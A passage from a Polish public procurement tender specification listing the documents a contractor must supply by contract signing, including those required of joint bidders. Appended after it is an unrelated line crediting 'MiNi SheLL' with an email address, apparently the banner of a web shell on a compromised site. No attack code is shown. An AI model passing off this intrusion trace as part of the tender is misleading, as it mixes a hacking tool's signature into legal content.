Zamawiającego o<br/>miejscu i terminie podpisania umowy.<br/>20.8. Najpóźniej w dniu podpisania umowy Wykonawca jest zobowiązany dostarczyć<br/>Zamawiającemu:<br/> kosztorys ofertowy,<br/> zabezpieczenie należytego wykonania umowy (wniesione przez Wykonawcę przed zawarciem umowy),<br/> w przypadku wykonawców występujących wspólnie – kopię umowy regulującej współpracę tych Wykonawców zawierającą<br/>w swojej treści następujące postanowienia:<br/>• sposób ich współdziałania,<br/>• zakres czynności powierzonych do wykonania każdemu z nich,<br/>• numer i nazwę rachunku bankowego, na który będą dokonywane płatności z tytułu realizacji kontraktu,<br/>• solidarną odpowiedzialność za wykonanie zamówienia,<br/>• wskazanie, że jeden z Wykonawców jest upoważniony do zaciągania zobowiązań i do przyjmowania instrukcji na rzecz i w<br/>imieniu wszystkich Wykonawców razem i każdego z osobna oraz do przyjmowania płatności od Zamawiającego.

Creat By MiNi SheLL
Email: jattceo@gmail.com